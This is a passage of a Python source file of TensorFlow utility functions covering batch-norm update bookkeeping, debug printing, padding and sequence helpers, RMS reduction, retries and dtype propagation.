      bn_update = tf.assign_sub(batch_norm_var, update_delta, name=scope)
  tf.add_to_collection(BATCH_NORM_UPDATES, bn_update)
  if not tf.executing_eagerly_outside_functions():
    # Graph mode only: record the (var, stats) pair so that
    # FindRelevantBatchNormUpdates can later match updates to a loss.
    bn_update_dict = _get_batch_norm_updates_dict()
    if bn_update.name in bn_update_dict:
      raise ValueError(f'BN update {bn_update.name} already exists.')
    bn_update_dict[bn_update.name] = (batch_norm_var, batch_norm_stats)
  return bn_update
def FindRelevantBatchNormUpdates(loss, batch_norm_updates):
  """Finds and returns a list of relevant batch-normalization updates.

  Args:
    loss: The loss that is being optimized for. A tensor or a list of tensors.
    batch_norm_updates: A list of batch normalization updates.

  Returns:
    A pair of lists. The first list contains all the batch normalization
    updates that are relevant to the loss being optimized, and the second list
    contains all in batch_norm_updates but not in the first list.
  """
  if tf.executing_eagerly_outside_functions():
    # The BN update bookkeeping dict is only maintained in graph mode.
    return [], []
  needed = set(FindNeeded(loss))
  bn_update_dict = _get_batch_norm_updates_dict()
  relevant_updates = []
  irrelevant_updates = []
  for bn_update in batch_norm_updates:
    assert bn_update.name in bn_update_dict, (
        f'{bn_update.name} is probably not a valid batch normalization update '
        'op. Make sure batch normalization is done through calling'
        ' the py_utils.UpdateBatchNormVars helper routine.')
    # An update is relevant iff the batch statistics it averages are computed
    # in the forward pass that produces `loss`.
    stat_name = bn_update_dict[bn_update.name][1].name
    if stat_name in needed:
      relevant_updates.append(bn_update)
    else:
      irrelevant_updates.append(bn_update)
  return relevant_updates, irrelevant_updates
_SAMPLE_STEP_STACK = ThreadLocalStack()
@contextlib.contextmanager
def SampleStep(step):
  """A context for a sample step during decoding.

  Example usage::

      with py_utils.SampleStep(step):
        sample = self.DecodeOneStep()

  Args:
    step: the step tensor.

  Yields:
    a context manager for the step scope.
  """
  try:
    _SAMPLE_STEP_STACK.stack.append(step)
    yield step
  finally:
    # Always restore the stack, even if the body raises.
    _SAMPLE_STEP_STACK.stack.pop()
def _GetSampleStep():
  """Returns the innermost SampleStep tensor, or None if outside any."""
  stack = _SAMPLE_STEP_STACK.stack
  if not stack:
    return None
  return stack[-1]
def AddDebugTensor(tensor, summarize=None, name=None):
  """Adds `tensor` to the debug collection.

  Prints the tensor if `--print_debug_tensors` is True.

  Args:
    tensor: A tensor.
    summarize: Only print this many entries of each tensor. If None, then a
      maximum of 3 elements are printed per input tensor.
    name: An optional name for the tensor.

  Returns:
    A Tensor that evaluates to the same value as the input tensor.
  """
  if _FromGlobal('print_debug_tensors'):
    step = _GetSampleStep()
    # Prepend the current sample step (if inside a SampleStep scope) so the
    # printed line can be correlated with the decoding step.
    tensors_to_print = ([] if step is None else [step]) + [tensor]
    with tf.name_scope(name) as s:
      # tf.Print passes `tensor` through unchanged while logging as a side
      # effect of evaluation.
      tensor = tf.Print(
          tensor,
          tensors_to_print,
          message='DEBUG tensor %s' % s,
          name=name,
          summarize=summarize)
  return tensor
def ArgMax(inputs):
  """tf.argmax wrapper.

  Args:
    inputs: A tensor, whose last dimension is being reduced on.

  Returns:
    A tensor of rank tf.rank(logits)-1. If i == ret[indices],
    logits[indices, i] is the maximum among logits[indices, :].
  """
  if not use_tpu():
    return tf.argmax(inputs, axis=-1)
  # On TPU, request int32 indices explicitly instead of the default dtype.
  return tf.argmax(inputs, axis=-1, output_type=tf.int32)
def _EnsureMatrixShape(x):
  """Ensures `x` has a rank-2 (matrix) static shape and returns it."""
  ndims = x.shape.ndims
  if ndims is None:
    # Unknown rank: constrain to a matrix of unknown dimensions.
    x.set_shape([None, None])
    return x
  assert ndims == 2
  return x
def Matmul(x, y, *args, **kwargs):
  """tf.matmul wrapper expecting x and y are actually matrices."""
  return tf.matmul(
      _EnsureMatrixShape(x), _EnsureMatrixShape(y), *args, **kwargs)
def clip_by_value(t, clip_value_min, clip_value_max, name=None):  # pylint: disable=invalid-name
  """tf.clip_by_value wrapper that also handles complex tensors.

  For complex input, the real and imaginary parts are clipped independently.
  """
  if not t.dtype.is_complex:
    return tf.clip_by_value(t, clip_value_min, clip_value_max, name)
  clipped_real = tf.clip_by_value(
      tf.math.real(t), clip_value_min, clip_value_max, '%s_real' % name)
  clipped_imag = tf.clip_by_value(
      tf.math.imag(t), clip_value_min, clip_value_max, '%s_imag' % name)
  return tf.complex(clipped_real, clipped_imag)
def _TransformAndSum(tensor_list, transform):
  """Apply a transform then sum the list."""
  with tf.name_scope('TransformAndSum'):
    partial_sums = []
    for t in tensor_list:
      with tf.device(t.device):
        # For sparse gradients, only the materialized values participate.
        dense = t.values if isinstance(t, tf.IndexedSlices) else t
        partial_sums.append(tf.reduce_sum(transform(dense)))
    if not partial_sums:
      return tf.constant(0.0)
    return tf.add_n(partial_sums)
def SumSquared(tensor_list):
  """Returns the sum of squared elements over all tensors in `tensor_list`."""
  return _TransformAndSum(tensor_list, lambda v: v**2)
def SumAbs(tensor_list):
  """Returns the sum of absolute values over all tensors in `tensor_list`."""
  return _TransformAndSum(tensor_list, tf.abs)
def ReduceRms(x: tf.Tensor) -> tf.Tensor:
  """Computes root mean square of tensor x with numerical stability.

  Args:
    x: a tensor with a fully-defined static shape.

  Returns:
    A scalar tensor: sqrt(mean(x**2)). For a 0-d input, returns x unchanged.

  Raises:
    ValueError: if the static shape of x is not fully defined.
  """
  if not x.shape.is_fully_defined():
    raise ValueError('Shape of x must be fully defined.')
  if not x.shape.as_list():
    # NOTE(review): for a scalar, rms would be |x|, but x is returned
    # unchanged here — preserved for backward compatibility; confirm callers.
    return x
  # Fix: the reduce lambda previously shadowed the outer `x`.
  denom = functools.reduce(lambda a, b: a * b, x.shape.as_list())
  if denom <= 1e8:
    return tf.math.sqrt(tf.math.reduce_mean(tf.math.square(x)))
  # For very large tensors, sum in two stages and divide explicitly to reduce
  # accumulation error relative to a single reduce_mean.
  tf.logging.info('reduce_rms %s denom=%d', x, denom)
  sum_square_x = tf.math.reduce_sum(tf.math.reduce_sum(tf.math.square(x), -1))
  avg_square_x = sum_square_x / tf.constant(denom, dtype=sum_square_x.dtype)
  return tf.math.sqrt(avg_square_x)
def PiecewiseConstant(x_in, boundaries, values, vdtype):
  """Returns the piecewise value of x_in."""
  x_in = tf.cast(tf.convert_to_tensor(x_in), tf.float32)
  assert len(values) == len(boundaries) + 1
  assert sorted(boundaries) == list(boundaries)
  bounds_t = tf.convert_to_tensor(boundaries, dtype=tf.float32)
  values_t = tf.convert_to_tensor(values, dtype=vdtype)
  # The number of boundaries <= x_in is the index of the active interval.
  index = tf.reduce_sum(tf.cast(tf.greater_equal(x_in, bounds_t), tf.int32))
  # The following is equivalent to 'return values_t[index]'.
  one_hot_vec = tf.one_hot(
      tf.expand_dims(index, 0), depth=len(values), dtype=vdtype)
  return Matmul(tf.reshape(values_t, (1, -1)), tf.transpose(one_hot_vec))[0][0]
def PadSequenceDimension(x, length, pad_val, shape=None, axis=1):
  """Pads x to `length` using `pad_val` along the axis dim.

  Assumes `x` is a tensor with rank >= 2, and it only pads `x` to `length`
  along the axis dim. Explicitly sets the returned tensor shape to `shape` if
  given. Raises runtime errors if x.shape[axis] > length or
  x.shape[i] != shape[i] where i != axis.

  Args:
    x: the tensor to be padded with axis dimension being the time. E.g., x
      usually has shape [batch, seq_len, ...], when axis=1.
    length: an int to specify the length to pad x to.
    pad_val: an int or float used to pad x.
    shape: an int array specifying the shape of the padded tensor if specified.
    axis: The dimension that x will be padded, default to 1.

  Returns:
    The padded tensor with shape [batch, seq_len, ...], where
    ret[:, :seq_len, ...] == x, when axis=1, and similarly for other axes.
  """
  if x.shape.ndims is not None:
    # Static-rank path: build the paddings list in Python.
    rank = x.shape.ndims
    assert rank >= 2
    slen = GetShape(x, rank)[axis]
    pad_len = length - slen
    pad = [[0, 0] for _ in range(rank)]
    pad[axis][1] = pad_len
  else:
    # Dynamic-rank path: build the [rank, 2] paddings tensor with pad_len
    # placed at position [axis, 1] (i.e. trailing padding on `axis`).
    rank = tf.rank(x)
    with tf.control_dependencies([assert_greater_equal(rank, 2)]):
      slen = tf.shape(x)[axis]
    pad_len = length - slen
    pad = tf.scatter_nd([[axis, 1]], [pad_len], [rank, 2])
  x = tf.pad(x, pad, constant_values=pad_val)
  if x.shape.ndims is not None and isinstance(length, int):
    # Re-assert the now statically-known padded dimension.
    static_shape = x.shape.as_list()
    static_shape[axis] = length
    x.set_shape(static_shape)
  if shape:
    if not isinstance(shape, (list, tuple)):
      raise TypeError('Shape must be a list or tuple.')
    x = HasRank(x, len(shape))
    x = tf.ensure_shape(x, shape)
  return x
def PadSequenceTo(xs, padding, length, pad_val):
  """Pads `xs` and `padding` to `length` along the second (time) dim.

  Each tensor in `xs` is padded with `pad_val`, while `padding` is padded
  with 1s (the new positions are marked as padded). Raises an error if
  `x.shape[:2]` and `padding.shape` are not the same.

  Args:
    xs: A Tensor or a list of Tensors of shape [batch, seqlen] or [batch,
      seqlen, ...].
    padding: A 0/1 Tensor of shape [batch, seqlen]. 1 is for padded locations.
    length: A Python int, the length to pad to.
    pad_val: A Python numeric, used for padding x.

  Returns:
    A tuple of padded xs and padding.
  """
  is_single_tensor = not isinstance(xs, (list, tuple))
  tensors = [xs] if is_single_tensor else xs
  padded_tensors = []
  for tensor in tensors:
    # Validate that `padding` matches the leading dims of every tensor.
    batch, slen = GetShape(tensor, 2)
    padding = HasRank(padding, 2)
    padding = HasShape(padding, [batch, slen])
    padded_tensors.append(PadSequenceDimension(tensor, length, pad_val))
  # The freshly added time steps in `padding` are marked as padded (1).
  padding = PadSequenceDimension(padding, length, tf.cast(1, padding.dtype))
  if is_single_tensor:
    assert len(padded_tensors) == 1
    return padded_tensors[0], padding
  return tuple(padded_tensors), padding
def ApplyPadding(padding, x, padded=None, use_select=True, ensure_shape=True):
  """Applies padding to a tensor.

  This is preferable to using arithmetic means for masking out padded values
  such as::

      # Equiv to ApplyPadding(padding, x)
      x *= 1.0 - padding
      # Equiv to ApplyPadding(padding, new, old)
      new = old * padding + new * (1 - padding)

  Aside from just being easier to read and reason about, using this function
  is friendly to quantized representations because it does not mix arithmetic
  on the padding values with the values in the tensor being padded (which can
  have a very different range than the 0..1 padding tensor).

  In addition, this works around issues in quantized schemes where we are
  guaranteed to have an exact 0 but not necessarily any other number (i.e. 1).

  Args:
    padding: Tensor of padding values where 0 == keep and 1 == pad.
    x: Tensor to apply padding to.
    padded: Optional. Values to include for padded elements. Defaults to zeros.
      Must have a shape broadcastable to 'x' if specified.
    use_select: Controls whether padding is applied with a select-mask
      (True/default) or arithmetically (False). Some platforms have a
      sensitivity to one or the other and this is used to work around such
      issues.
    ensure_shape: If true, ensures the shape of the result is the same as of x.

  Returns:
    A tensor with the same shape as x with padded values masked.
  """
  # Runtime check that padding is strictly 0/1-valued; any other value would
  # silently corrupt both the select path and the arithmetic path.
  padding = with_dependencies([
      Assert(
          tf.reduce_all(
              tf.math.logical_or(
                  tf.equal(padding, tf.zeros([], padding.dtype)),
                  tf.equal(padding, tf.ones([], padding.dtype)))), [padding])
  ], padding)
  if use_select:
    if padded is None:
      padded = tf.zeros([], x.dtype)
    # tf.where needs a boolean mask; treat any nonzero value as "padded".
    if padding.dtype != tf.bool:
      padding = padding > tf.zeros([], padding.dtype)
    result = tf.where_v2(padding, padded, x)
  else:
    # Arithmetic path: zero out padded positions, then add `padded` there.
    result = x * tf.cast(1.0 - tf.cast(padding, tf.float32), x.dtype)
    if padded is not None:
      result += padded * tf.cast(padding, padded.dtype)
  if ensure_shape:
    result = tf.ensure_shape(result, x.shape)
  return result
def LengthsFromPaddings(paddings, dtype=None):
  """Computes the unpadded length of each sequence, ignoring trailing padding.

  Note the following isn't guaranteed due to leading paddings.
  PaddingsFromLengths(LengthsFromPaddings(x)) == x

  Args:
    paddings: a tensor with shape [batch, length].
    dtype: A type to optionally cast the result to.

  Returns:
    lengths tensor shaped [batch] containing the unpadded length of each
    sequence in the batch.
  """
  paddings = HasRank(paddings, 2)
  mask = 1 - tf.cast(paddings, tf.int32)
  # `tf.reduce_sum(mask, axis=1)` alone would miscount when there is leading
  # padding. Instead, note that in the running sum below every trailing
  # padding position — and also the final unpadded position — holds the same
  # value as the last column. Counting the positions that *differ* from the
  # last column therefore yields unpadded_length - 1.
  running = tf.cumsum(mask, axis=1)
  matches_last = tf.equal(running, running[:, -1:])
  lengths = tf.reduce_sum(
      1 - tf.cast(matches_last, tf.int32), axis=1) + 1
  # An all-padding row would produce 1 by the rule above (every entry matches
  # the last, so zero entries differ); force those rows to length 0.
  empty_rows = tf.equal(tf.reduce_sum(mask, axis=1), 0)
  lengths = tf.where(empty_rows, tf.zeros_like(lengths), lengths)
  if dtype and lengths.dtype != dtype:
    lengths = tf.cast(lengths, dtype)
  return lengths
def PaddingsFromLengths(lengths, maxlen=None):
  """Builds a 0/1 paddings Tensor from per-sequence lengths.

  Note the following isn't guaranteed due to leading paddings.
  PaddingsFromLengths(LengthsFromPaddings(x)) == x.
  This method does not generate leading paddings.

  Args:
    lengths: A int32 Tensor of shape [B].
    maxlen: None or a Python int or a scalar Tensor.

  Returns:
    A 0/1 valued Tensor of shape [B, maxlen or ?] where 1s are padded positions.
  """
  lengths = HasRank(lengths, 1)
  if maxlen is not None:
    # Guard: no sequence may be longer than the requested maxlen.
    lengths = with_dependencies(
        [assert_less_equal(tf.cast(tf.reduce_max(lengths), tf.int32), maxlen)],
        lengths)
  # sequence_mask marks valid positions with 1; invert to get paddings.
  valid_mask = tf.sequence_mask(lengths, maxlen=maxlen, dtype=tf.float32)
  return 1. - valid_mask
def TrimTrailingPaddings(inputs, paddings):
  """Trims trailing padding frames from `inputs` and `paddings`.

  Since the number of dimensions is not fixed, this will not work on TPU.

  Args:
    inputs: a tensor with shape [batch, length, ...].
    paddings: a tensor with shape [batch, length].

  Returns:
    Trimmed inputs and paddings. For compatibility reasons, the trimmed tensors
    will always have length at least 1.
  """
  paddings = HasRank(paddings, 2)
  # Keep at least one frame even when every sequence is fully padded.
  trimmed_len = tf.maximum(tf.reduce_max(LengthsFromPaddings(paddings)), 1)
  in_shape = tf.shape(inputs)
  trimmed_shape = tf.concat([[in_shape[0], trimmed_len], in_shape[2:]],
                            axis=0)
  trimmed_inputs = tf.slice(inputs, tf.zeros_like(trimmed_shape),
                            trimmed_shape)
  trimmed_paddings = tf.slice(paddings, [0, 0],
                              tf.stack([trimmed_shape[0], trimmed_len]))
  return trimmed_inputs, trimmed_paddings
def ReversePaddedSequence(inputs, paddings):
  """Reverses the unpadded prefix of `inputs` along the time axis.

  Only the unpadded portion of `inputs` is reversed. It assumes inputs are
  only padded in the end.

  Args:
    inputs: a tensor of [seq_length, batch_size, num_input_nodes].
    paddings: a tensor of float32/float64 zero or one of shape [seq_length,
      batch_size, 1].

  Returns:
    A reversed tensor of the same shape as `inputs`.
  """
  # Per-example unpadded lengths; rint guards against float rounding noise
  # before the int cast.
  valid_mask = 1.0 - tf.squeeze(paddings, 2)
  lengths = tf.cast(
      tf.math.rint(tf.reduce_sum(valid_mask, axis=0)), tf.int32)
  return tf.reverse_sequence(inputs, lengths, seq_axis=0, batch_axis=1)
def ConcatenatePaddedSequences(input0, input1, padding0, padding1, seq_dim=1):
  """Concatenates input sequences with varying lengths as defined by paddings.

  This is a helper function for concatenating 2 batches of input sequences,
  where each example in the batch can have different lengths, as defined by
  the corresponding paddings. To concatenate correctly, it makes use of
  tf.reverse_sequence to partially reverse the sequences before
  concatenating them together.

  NOTE: We assume that the tensors have no leading paddings.

  Args:
    input0: A tensor of size [batch, max_length, ...] or [max_length, batch,
      ...] depending on the value set for axis.
    input1: A tensor of size [batch, max_length, ...] or [max_length, batch,
      ...] depending on the value set for axis.
    padding0: A Tensor of size [batch, max_length] or [max_length, batch]
      corresponding to the padding for input0.
    padding1: A Tensor of size [batch, max_length] or [max_length, batch]
      corresponding to the padding for input1.
    seq_dim: int, the time axis along which the tensors will be concatenated.
      Should be 0 or 1. Assumes that batch_dim is 1 - seq_dim.

  Returns:
    The concatenation of input0 and input1, and the corresponding padding.

  Raises:
    tf.errors.InvalidArgumentError when seq_dim is not 0 or 1.
  """
  if seq_dim != 0 and seq_dim != 1:
    raise tf.errors.InvalidArgumentError(None, None, 'seq_dim must be 0 or 1.')
  batch_dim = 1 - seq_dim
  # input0 and input1 should have the same batch size and same rank.
  input0 = with_dependencies([
      assert_equal(GetShape(input0)[batch_dim],
                   GetShape(input1)[batch_dim]),
      assert_equal(GetRank(input0), GetRank(input1))
  ], input0)
  batch_size = GetShape(padding0)[batch_dim]
  # batch dimension of inputs and paddings should match.
  input0 = with_dependencies([
      assert_equal(GetShape(input0)[batch_dim], batch_size),
      assert_equal(GetShape(padding1)[batch_dim], batch_size)
  ], input0)
  # Padded (maximum) sequence lengths, tiled to one value per example.
  input0_seq_dim = tf.cast(
      tf.tile([tf.shape(padding0)[seq_dim]], [batch_size]), dtype=tf.int32)
  input1_seq_dim = tf.cast(
      tf.tile([tf.shape(padding1)[seq_dim]], [batch_size]), dtype=tf.int32)
  # LengthsFromPaddings assumes that paddings is of size [batch, max_length].
  if seq_dim == 1:
    seq_length0 = LengthsFromPaddings(padding0)
    seq_length1 = LengthsFromPaddings(padding1)
  else:
    seq_length0 = LengthsFromPaddings(tf.transpose(padding0))
    seq_length1 = LengthsFromPaddings(tf.transpose(padding1))
  # We assume that the tensors have no leading paddings. Under that
  # assumption the unpadded length equals the total number of 0s in the
  # padding, which is what these asserts verify.
  # TODO(arunnt): Concatenate tensors with leading paddings correctly.
  seq_length0 = with_dependencies([
      assert_equal(
          seq_length0,
          tf.cast(tf.reduce_sum(1.0 - padding0, seq_dim), dtype=tf.int32))
  ], seq_length0)
  seq_length1 = with_dependencies([
      assert_equal(
          seq_length1,
          tf.cast(tf.reduce_sum(1.0 - padding1, seq_dim), dtype=tf.int32))
  ], seq_length1)
  # Concatenate input sequences: reverse input0 by its unpadded length and
  # input1 fully, concatenate [reversed1, reversed0], then reverse the first
  # seq_length0 + max_length1 steps back — this lands input1's frames
  # immediately after input0's unpadded prefix.
  reversed_input0 = tf.reverse_sequence(
      input0, seq_length0, seq_axis=seq_dim, batch_axis=batch_dim)
  reversed_input1 = tf.reverse_sequence(
      input1, input1_seq_dim, seq_axis=seq_dim, batch_axis=batch_dim)
  reversed_concat = tf.concat([reversed_input1, reversed_input0], axis=seq_dim)
  concat_inputs = tf.reverse_sequence(
      reversed_concat,
      seq_length0 + input1_seq_dim,
      seq_axis=seq_dim,
      batch_axis=batch_dim)
  # Concatenate paddings. Note that paddings are always a Tensor of 0s and 1s,
  # so, unlike the inputs, we don't have to reverse padding1, we can simply
  # concatenate reversed padding0 and padding1.
  reversed_padding0 = tf.reverse_sequence(
      padding0, input0_seq_dim, seq_axis=seq_dim, batch_axis=batch_dim)
  reversed_concat_padding = tf.concat([reversed_padding0, padding1],
                                      axis=seq_dim)
  concat_paddings = tf.reverse_sequence(
      reversed_concat_padding,
      input0_seq_dim + seq_length1,
      seq_axis=seq_dim,
      batch_axis=batch_dim)
  return concat_inputs, concat_paddings
def ShiftLeft(tensor, shift_size, pad_val=0, axis=1):
  """Shifts `tensor` to the left along the `axis` dimension.

  The first `shift_size` values are dropped, and the tensor is padded on the
  right with `pad_val` so its time dimension keeps its original size.

  Args:
    tensor: the input tensor with the axis dim being time.
    shift_size: the number of frames >= 0 to shift.
    pad_val: the value to pad on the right of the tensor.
    axis: The dimension along which the tensor will be shifted, default to 1.

  Returns:
    A left shifted tensor on dimension axis.
  """
  rank = tensor.shape.rank
  with tf.control_dependencies(
      [assert_greater_equal(rank, 2),
       assert_greater_equal(shift_size, 0)]):
    orig_time = GetShape(tensor)[axis]
    # Slice offset: shift_size along `axis`, zero everywhere else.
    start = tf.scatter_nd([[axis]], [shift_size], [rank])
  shifted = tf.slice(tensor, start, size=[-1] * rank)
  return PadSequenceDimension(shifted, orig_time, pad_val, axis=axis)
def CreateIdsAndLabels(ids, paddings, sos_id=1, eos_id=2, trim=False):
  """Creates ids and labels to be used as decoder targets.

  Args:
    ids: int Tensor of shape [batch, maxlen], without sos or eos.
    paddings: float Tensor of shape [batch, maxlen].
    sos_id: ID for the sos special token.
    eos_id: ID for the eos special token.
    trim: Whether to trim the last elements in the output Tensors, so that the
      lengths of the output Tensors are same as the input Tensors. Otherwise,
      the output Tensors are longer than the input Tensors by one because of
      the added sos / eos.

  Returns:
    A NestedMap with the following fields, where maxlen' equals maxlen when
    trim=True, otherwise maxlen + 1:

    - ids: int Tensor of shape [batch, maxlen'], with sos prepended.
    - labels: int Tensor of shape [batch, maxlen'], with eos appended.
    - paddings: float Tensor of shape [batch, maxlen'].
    - weights: float Tensor of shape [batch, maxlen'].
  """
  # Overwrite padded positions with eos so labels are well-defined there.
  clean_ids = tf.where(
      tf.equal(paddings, 0.0), ids,
      tf.broadcast_to([[eos_id]], GetShape(ids)))
  targets = NestedMap()
  # sos is prepended for the decoder inputs; eos is appended for the labels.
  targets.ids = tf.pad(clean_ids, [[0, 0], [1, 0]], constant_values=sos_id)
  targets.labels = tf.pad(clean_ids, [[0, 0], [0, 1]], constant_values=eos_id)
  targets.paddings = tf.pad(paddings, [[0, 0], [1, 0]])
  targets.weights = 1.0 - targets.paddings
  if trim:
    # Drop the last step from every field to restore the input length.
    targets = targets.Transform(lambda v: v[:, :-1])
  return targets
def Retry(*args, **kwargs):
  """Thin alias for `retry.Retry`; see that decorator for the arguments."""
  return retry.Retry(*args, **kwargs)
# TF exception types that are usually transient and therefore safe to retry:
# FailedPreconditionError: variables are not initialized.
# AbortedError: processes restarts.
# UnavailableError: Bad hardware status: 0x1
transient_tf_errors = (tf.errors.FailedPreconditionError,
                       tf.errors.AbortedError, tf.errors.UnavailableError)


def RetryOnTransientTfError(*args, **kwargs):
  """Returns a `Retry` decorator that retries on `transient_tf_errors`."""
  return Retry(transient_tf_errors, *args, **kwargs)
def PadOrTrimTo(x, shape, pad_val=0, pad_after_contents=True):
  """Pad and slice x to the given shape.

  Args:
    x: A tensor.
    shape: The shape of the returned tensor.
    pad_val: An int or float used to pad x.
    pad_after_contents: Whether to pad and trim after the original contents of
      each dimension.

  Returns:
    'x' is padded with pad_val and sliced so that the result has the given
    shape.

  Raises:
    ValueError: if shape is a tf.TensorShape and not fully defined.
  """
  if isinstance(shape, (list, tuple)):
    expected_rank = len(shape)
  elif isinstance(shape, tf.TensorShape):
    if not shape.is_fully_defined():
      raise ValueError('shape %s padding %s must be fully defined.' %
                       (shape, x))
    expected_rank = shape.rank
  else:
    # `shape` is a rank-1 tensor of dim sizes.
    shape = HasRank(shape, 1)
    expected_rank = tf.size(shape)
  x = HasRank(x, expected_rank)

  # Per-dimension amount of padding needed; 0 wherever dim_i >= shape[i].
  pad_amounts = shape - tf.minimum(tf.shape(x), shape)
  no_pad = tf.zeros_like(pad_amounts)
  if pad_after_contents:
    # Pad after the contents; oversized dims are trimmed to [0:shape[i]].
    paddings = tf.stack([no_pad, pad_amounts], axis=1)
    slice_begin = no_pad
  else:
    # Pad before the contents; oversized dims are trimmed to
    # [dim_i - shape[i]:dim_i].
    paddings = tf.stack([pad_amounts, no_pad], axis=1)
    slice_begin = tf.shape(x) + pad_amounts - shape
  padded = tf.pad(x, paddings, constant_values=pad_val)
  trimmed = tf.slice(padded, slice_begin, shape)
  return tf.reshape(trimmed, shape)
def ExpandTo(x, target_rank):
  """Appends size-1 dimensions to `x` until it has rank `target_rank`."""
  if x is None:
    return None
  cur_shape = GetShape(x)
  cur_rank = GetRank(x)
  extra_dims = target_rank - cur_rank
  if isinstance(extra_dims, tf.Tensor):
    # Dynamic rank: assemble the new shape as a tensor.
    expanded_shape = tf.concat([cur_shape, tf.ones([extra_dims], tf.int32)],
                               -1)
  else:
    expanded_shape = cur_shape + [1] * extra_dims
  expanded = tf.reshape(x, expanded_shape)
  if not isinstance(target_rank, tf.Tensor):
    # Record the now statically-known rank on the result.
    expanded.shape.with_rank(target_rank)
  return expanded
def ExpandAndPadOrTrimTo(x, target_shape, pad_val=0):
  """Ensures that x is broadcast compatible with target_shape.

  x is first expanded to the target rank. Thereafter, if x is not broadcast
  compatible with target_shape the non-broadcast compatible dimensions are
  either padded or trimmed to the target shape.

  Args:
    x: A tensor.
    target_shape: A tensor shape either as a list or Tensor.
    pad_val: The value to pad.

  Returns:
    A tensor which is broadcast compatible with target_shape.
  """
  if x is None:
    return None
  if isinstance(target_shape, tf.Tensor):
    target_rank = GetShape(target_shape)[0]
  else:
    target_rank = len(target_shape)
  x = ExpandTo(x, target_rank)

  x_shape = GetShape(x)
  fully_static = (not isinstance(x_shape, tf.Tensor) and
                  all(not isinstance(d, tf.Tensor) for d in x_shape))
  # Dimensions of size 1 stay 1 so broadcasting still applies to them; all
  # other dimensions are forced to the target size.
  if fully_static:
    adjusted_shape = [
        1 if x_shape[i] == 1 else target_shape[i] for i in range(len(x_shape))
    ]
  else:
    adjusted_shape = tf.where(
        tf.equal(x_shape, 1), tf.ones_like(target_shape), target_shape)
  adjusted = PadOrTrimTo(x, adjusted_shape, pad_val)
  return tf.reshape(adjusted, adjusted_shape)
def RepeatDim(tensor, multiple, axis):
  """Repeats each element along `axis` `multiple` times, like np.repeat.

  E.g. for x = [[1, 2, 3], [4, 5, 6]]:
    RepeatDim(x, multiple=2, axis=1) gives
      [[1, 1, 2, 2, 3, 3], [4, 4, 5, 5, 6, 6]]
  whereas tf.tile(x, multiples=[1, 2]) gives
      [[1, 2, 3, 1, 2, 3], [4, 5, 6, 4, 5, 6]].
  """
  if multiple == 1:
    return tensor
  shape = tf.shape(tensor)
  # Final shape: the axis dim grows by `multiple`; all others are unchanged.
  out_shape = tf.concat(
      [shape[:axis], [shape[axis] * multiple], shape[axis + 1:]], 0)
  # Tile only the freshly inserted dimension at axis + 1, then collapse it
  # into `axis` — this interleaves copies rather than appending them.
  tile_multiples = tf.concat([
      tf.fill([axis + 1], 1), [multiple],
      tf.fill([tf.rank(tensor) - axis - 1], 1)
  ], 0)
  expanded = tf.expand_dims(tensor, axis + 1)
  return tf.reshape(tf.tile(expanded, tile_multiples), out_shape)
def StackTensorsRecursively(values):
  """Recursively stacks Tensors in a list of `.NestedMap`.

  Args:
    values: a list of `.NestedMap` or Tensors to stacks.

  Returns:
    A `.NestedMap` with stacked values or a stacked Tensor.
  """
  flattened = [v.Flatten() for v in values]
  # Transpose the list-of-lists: group the i-th leaf across every map, then
  # stack each group into a single tensor.
  stacked = [tf.stack(list(leaves)) for leaves in zip(*flattened)]
  return values[0].Pack(stacked)
def MixByWeight(inputs, weights, seed=None):
  """Returns a weighted random choice and bprop type from the give inputs.

  Args:
    inputs: a list of callables, where each callable returns a tf.Tensor or a
      nested structure containing tf.Tensor. Function return types must be
      consistent across elements. The tf.Operation to compute the result tensor
      will only be invoked for one input at a time. For example, if each fn
      represents an input record stream, a record will be drawn only from a
      selected stream while the other streams will remain unchanged.
    weights: a 1D tensor of float > 0 of the same length as inputs.
    seed: random seed.

  Returns:
    A probabilistic sample from the inputs proportional to the weights. The
    return type will be the same as return type of individual 'fn' from the
    inputs.
    A one-hot vector of the source selected.
  """
  weights = tf.convert_to_tensor(weights, dtype=tf.float32)
  weights = with_dependencies([
      assert_equal(tf.shape(weights), [len(inputs)]),
      assert_greater_equal(tf.reduce_min(weights), 0.0)
  ], weights)
  # Partition [0, sum(weights)) into half-open buckets [lower[i], upper[i]),
  # one per input; a uniform draw r then selects input i with probability
  # proportional to weights[i].
  lower = tf.cumsum(weights, exclusive=True)
  upper = tf.cumsum(weights, exclusive=False)
  r = tf.random.uniform(shape=[], maxval=upper[-1], seed=seed)
  return_input = tf.case(
      [(tf.math.logical_and(lower[i] <= r, r < upper[i]), inputs[i])
       for i in range(len(inputs))],
      exclusive=True)
  # `lambda i=i` binds the loop variable at definition time; a plain lambda
  # would late-bind and make every branch return the last index.
  selected_index = tf.case(
      [(tf.math.logical_and(lower[i] <= r, r < upper[i]), lambda i=i: i)
       for i in range(len(inputs))],
      exclusive=True)
  bprop_index = tf.one_hot(selected_index, len(inputs), dtype=tf.float32)
  return return_input, bprop_index
def CheckShapes(shapes):
  """Asserts that shapes is a tuple of NestedMap or tshape.Shape."""
  assert isinstance(shapes, tuple), str(shapes)
  for entry in shapes:
    if isinstance(entry, NestedMap):
      # Every leaf of the NestedMap must itself be a symbolic shape.
      leaves_ok = all([isinstance(t, tshape.Shape) for t in Flatten(entry)])
      assert leaves_ok, '{} contains non-tensor value.'.format(entry)
    else:
      assert isinstance(entry, tshape.Shape), '{}: {}'.format(
          type(entry), entry)
def FPropDtype(params):
  """Returns the fprop dtype: `params.fprop_dtype` if set, else `params.dtype`."""
  if params.fprop_dtype is not None:
    return params.fprop_dtype
  return params.dtype
def UpdateFpropDtype(params, fprop_dtype):
  """Recursively sets `fprop_dtype` on `params` and every nested Params."""
  # "params" may not be a hyperparams.Params instance — e.g. when recursing
  # into the items of a "sub" list of SequentialLayer (see the list/tuple
  # case below); those items are silently skipped when they are not Params.
  if not isinstance(params, hyperparams.Params):
    return
  for name, value in params.IterParams():
    if isinstance(value, hyperparams.Params):
      UpdateFpropDtype(value, fprop_dtype)
    elif isinstance(value, (list, tuple)):
      for element in value:
        UpdateFpropDtype(element, fprop_dtype)
    elif name == 'fprop_dtype':
      params.fprop_dtype = fprop_dtype
def UpdateDtype(params, dtype):
  """Recursively sets `dtype` on `params` and every nested Params."""
  # "params" may not be a hyperparams.Params instance — e.g. when recursing
  # into the items of a "sub" list of SequentialLayer (see the list/tuple
  # case below); those items are silently skipped when they are not Params.
  if not isinstance(params, hyperparams.Params):
    return
  for name, value in params.IterParams():
    if isinstance(value, hyperparams.Params):
      UpdateDtype(value, dtype)
    elif isinstance(value, (list, tuple)):
      for element in value:
